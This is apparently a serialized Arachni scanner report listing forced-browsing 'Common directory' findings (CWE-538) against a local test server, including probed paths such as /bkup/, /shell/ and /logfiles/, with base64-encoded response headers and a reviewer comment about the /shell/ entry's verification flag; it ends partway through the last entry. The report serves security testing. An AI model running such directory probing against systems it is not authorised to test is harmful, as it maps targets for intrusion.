mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/user/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/user/ injected: user id: user elem: path remarks: {} method: '' response: user headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/demos/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/demos/ injected: demos id: demos elem: path remarks: {} method: '' response: demos headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/bkup/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/bkup/ injected: bkup id: bkup elem: path remarks: {} method: '' response: bkup headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/orders/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/orders/ injected: orders id: orders elem: path remarks: {} method: '' response: orders headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/wp-content/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/wp-content/ injected: wp-content id: wp-content elem: path remarks: {} method: '' response: wp-content headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/demo/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/demo/ injected: demo id: demo elem: path remarks: {} method: '' response: demo headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/ftp/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/ftp/ injected: ftp id: ftp elem: path remarks: {} method: '' response: ftp headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/member/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/member/ injected: member id: member elem: path remarks: {} method: '' response: member headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/common/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/common/ injected: common id: common elem: path remarks: {} method: '' response: common headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
# NOTE(review): the /shell/ entry on the line below is the only one in this run
# recorded with verification: true, on both the outer issue and its variation;
# the neighbouring entries all carry verification: false.
# Presumably Arachni sets this flag on results that need manual verification —
# confirm against the version that wrote the file.
# Nothing else stored here sets the entry apart: the response body is the
# probed name ("shell") and Content-Length decodes to 5 (NQ==), the same shape
# as the other entries, so the reason for the flag is not visible in this data.
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/shell/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/shell/ injected: shell id: shell elem: path remarks: {} method: '' response: shell headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/readme/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/readme/ injected: readme id: readme elem: path remarks: {} method: '' response: readme headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/main/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/main/ injected: main id: main elem: path remarks: {} method: '' response: main headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/logfiles/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/logfiles/ injected: logfiles id: logfiles elem: path remarks: {} method: '' response: logfiles headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/index/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/index/ injected: index id: index elem: path remarks: {} method: '' response: index headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxNCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/members/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/members/ injected: members id: members elem: path remarks: {} method: '' response: members headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/ibill/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/ibill/ injected: ibill id: ibill elem: path remarks: {} method: '' response: ibill headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- 